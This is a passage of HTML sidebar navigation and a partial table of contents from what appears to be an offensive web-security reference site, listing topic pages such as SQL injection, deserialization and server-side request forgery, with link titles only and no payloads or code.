<label class="md-nav__link" for="__nav_21" id="__nav_21_label" tabindex="0">
<span class="md-ellipsis">
GraphQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_21_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_21">
<span class="md-nav__icon md-icon"></span>
GraphQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../GraphQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
GraphQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_22" >
<label class="md-nav__link" for="__nav_22" id="__nav_22_label" tabindex="0">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_22_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_22">
<span class="md-nav__icon md-icon"></span>
HTTP Parameter Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../HTTP%20Parameter%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" >
<label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
<span class="md-ellipsis">
Headless Browser
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_23">
<span class="md-nav__icon md-icon"></span>
Headless Browser
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Headless%20Browser/" class="md-nav__link">
<span class="md-ellipsis">
Headless Browser
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
<label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
<span class="md-ellipsis">
Hidden Parameters
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_24">
<span class="md-nav__icon md-icon"></span>
Hidden Parameters
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Hidden%20Parameters/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Hidden Parameters
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_25" >
<label class="md-nav__link" for="__nav_25" id="__nav_25_label" tabindex="0">
<span class="md-ellipsis">
Insecure Deserialization
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_25_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_25">
<span class="md-nav__icon md-icon"></span>
Insecure Deserialization
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/DotNET/" class="md-nav__link">
<span class="md-ellipsis">
.NET Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Java/" class="md-nav__link">
<span class="md-ellipsis">
Java Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Node/" class="md-nav__link">
<span class="md-ellipsis">
Node Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/PHP/" class="md-nav__link">
<span class="md-ellipsis">
PHP Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Python/" class="md-nav__link">
<span class="md-ellipsis">
Python Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Ruby Deserialization
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_26" >
<label class="md-nav__link" for="__nav_26" id="__nav_26_label" tabindex="0">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_26_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_26">
<span class="md-nav__icon md-icon"></span>
Insecure Direct Object References
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Direct%20Object%20References/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_27" >
<label class="md-nav__link" for="__nav_27" id="__nav_27_label" tabindex="0">
<span class="md-ellipsis">
Insecure Management Interface
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_27_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_27">
<span class="md-nav__icon md-icon"></span>
Insecure Management Interface
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Management%20Interface/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Management Interface
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_28" >
<label class="md-nav__link" for="__nav_28" id="__nav_28_label" tabindex="0">
<span class="md-ellipsis">
Insecure Randomness
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_28_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_28">
<span class="md-nav__icon md-icon"></span>
Insecure Randomness
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Randomness/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Randomness
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_29" >
<label class="md-nav__link" for="__nav_29" id="__nav_29_label" tabindex="0">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_29_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_29">
<span class="md-nav__icon md-icon"></span>
Insecure Source Code Management
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Bazaar/" class="md-nav__link">
<span class="md-ellipsis">
Bazaar
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Git/" class="md-nav__link">
<span class="md-ellipsis">
Git
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Mercurial/" class="md-nav__link">
<span class="md-ellipsis">
Mercurial
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/Subversion/" class="md-nav__link">
<span class="md-ellipsis">
Subversion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_30" >
<label class="md-nav__link" for="__nav_30" id="__nav_30_label" tabindex="0">
<span class="md-ellipsis">
JSON Web Token
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_30_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_30">
<span class="md-nav__icon md-icon"></span>
JSON Web Token
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../JSON%20Web%20Token/" class="md-nav__link">
<span class="md-ellipsis">
JWT - JSON Web Token
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_31" >
<label class="md-nav__link" for="__nav_31" id="__nav_31_label" tabindex="0">
<span class="md-ellipsis">
Java RMI
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_31_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_31">
<span class="md-nav__icon md-icon"></span>
Java RMI
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Java%20RMI/" class="md-nav__link">
<span class="md-ellipsis">
Java RMI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_32" >
<label class="md-nav__link" for="__nav_32" id="__nav_32_label" tabindex="0">
<span class="md-ellipsis">
LDAP Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_32_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_32">
<span class="md-nav__icon md-icon"></span>
LDAP Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LDAP%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LDAP Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_33" >
<label class="md-nav__link" for="__nav_33" id="__nav_33_label" tabindex="0">
<span class="md-ellipsis">
LaTeX Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_33_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_33">
<span class="md-nav__icon md-icon"></span>
LaTeX Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LaTeX%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LaTeX Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_34" >
<label class="md-nav__link" for="__nav_34" id="__nav_34_label" tabindex="0">
<span class="md-ellipsis">
Mass Assignment
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_34_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_34">
<span class="md-nav__icon md-icon"></span>
Mass Assignment
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Mass%20Assignment/" class="md-nav__link">
<span class="md-ellipsis">
Mass Assignment
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_35" >
<label class="md-nav__link" for="__nav_35" id="__nav_35_label" tabindex="0">
<span class="md-ellipsis">
Methodology and Resources
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_35_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_35">
<span class="md-nav__icon md-icon"></span>
Methodology and Resources
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Active%20Directory%20Attack/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - AWS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - Azure
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Docker%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Kubernetes%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Kubernetes
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Escape%20Breakout/" class="md-nav__link">
<span class="md-ellipsis">
Application Escape and Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/HTML%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Hash%20Cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Initial%20Access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/MSSQL%20Server%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Server
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Methodology%20and%20enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology and Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Pivoting%20Techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Office%20-%20Attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Powershell%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management &amp; CI/CD Compromise
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Vulnerability%20Reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Web%20Attack%20Surface/" class="md-nav__link">
<span class="md-ellipsis">
Subdomains Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20DPAPI/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Mimikatz/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Using%20credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_36" >
<label class="md-nav__link" for="__nav_36" id="__nav_36_label" tabindex="0">
<span class="md-ellipsis">
NoSQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_36_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_36">
<span class="md-nav__icon md-icon"></span>
NoSQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../NoSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
NoSQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_37" >
<label class="md-nav__link" for="__nav_37" id="__nav_37_label" tabindex="0">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_37_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_37">
<span class="md-nav__icon md-icon"></span>
OAuth Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../OAuth%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_38" >
<label class="md-nav__link" for="__nav_38" id="__nav_38_label" tabindex="0">
<span class="md-ellipsis">
ORM Leak
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_38_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_38">
<span class="md-nav__icon md-icon"></span>
ORM Leak
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../ORM%20Leak/" class="md-nav__link">
<span class="md-ellipsis">
ORM Leak
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_39" >
<label class="md-nav__link" for="__nav_39" id="__nav_39_label" tabindex="0">
<span class="md-ellipsis">
Open Redirect
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_39_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_39">
<span class="md-nav__icon md-icon"></span>
Open Redirect
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Open%20Redirect/" class="md-nav__link">
<span class="md-ellipsis">
Open URL Redirect
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_40" >
<label class="md-nav__link" for="__nav_40" id="__nav_40_label" tabindex="0">
<span class="md-ellipsis">
Prompt Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_40_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_40">
<span class="md-nav__icon md-icon"></span>
Prompt Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prompt%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Prompt Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_41" >
<label class="md-nav__link" for="__nav_41" id="__nav_41_label" tabindex="0">
<span class="md-ellipsis">
Prototype Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_41_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_41">
<span class="md-nav__icon md-icon"></span>
Prototype Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prototype%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
Prototype Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_42" >
<label class="md-nav__link" for="__nav_42" id="__nav_42_label" tabindex="0">
<span class="md-ellipsis">
Race Condition
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_42_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_42">
<span class="md-nav__icon md-icon"></span>
Race Condition
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Race%20Condition/" class="md-nav__link">
<span class="md-ellipsis">
Race Condition
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_43" >
<label class="md-nav__link" for="__nav_43" id="__nav_43_label" tabindex="0">
<span class="md-ellipsis">
Regular Expression
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_43_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_43">
<span class="md-nav__icon md-icon"></span>
Regular Expression
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Regular%20Expression/" class="md-nav__link">
<span class="md-ellipsis">
Regular Expression
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_44" >
<label class="md-nav__link" for="__nav_44" id="__nav_44_label" tabindex="0">
<span class="md-ellipsis">
Request Smuggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_44">
<span class="md-nav__icon md-icon"></span>
Request Smuggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Request%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
Request Smuggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_45" >
<label class="md-nav__link" for="__nav_45" id="__nav_45_label" tabindex="0">
<span class="md-ellipsis">
SAML Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_45_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_45">
<span class="md-nav__icon md-icon"></span>
SAML Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../SAML%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SAML Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_46" >
<label class="md-nav__link" for="__nav_46" id="__nav_46_label" tabindex="0">
<span class="md-ellipsis">
SQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_46_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_46">
<span class="md-nav__icon md-icon"></span>
SQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../SQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/BigQuery%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Google BigQuery SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/Cassandra%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cassandra Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/DB2%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
DB2 Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/MSSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/MySQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MySQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/OracleSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Oracle SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/PostgreSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
PostgreSQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/SQLite%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQLite Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/SQLmap/" class="md-nav__link">
<span class="md-ellipsis">
SQLmap
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_47" >
<label class="md-nav__link" for="__nav_47" id="__nav_47_label" tabindex="0">
<span class="md-ellipsis">
Server Side Include Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_47_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_47">
<span class="md-nav__icon md-icon"></span>
Server Side Include Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Include%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Include Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_48" checked>
<label class="md-nav__link" for="__nav_48" id="__nav_48_label" tabindex="0">
<span class="md-ellipsis">
Server Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_48_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_48">
<span class="md-nav__icon md-icon"></span>
Server Side Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#methodology" class="md-nav__link">
<span class="md-ellipsis">
Methodology
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-filters" class="md-nav__link">
<span class="md-ellipsis">
Bypassing Filters
</span>
</a>
<nav class="md-nav" aria-label="Bypassing Filters">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#default-targets" class="md-nav__link">
<span class="md-ellipsis">
Default Targets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-ipv6-notation" class="md-nav__link">
<span class="md-ellipsis">
Bypass Localhost with IPv6 Notation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-a-domain-redirect" class="md-nav__link">
<span class="md-ellipsis">
Bypass Localhost with a Domain Redirect
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-cidr" class="md-nav__link">
<span class="md-ellipsis">
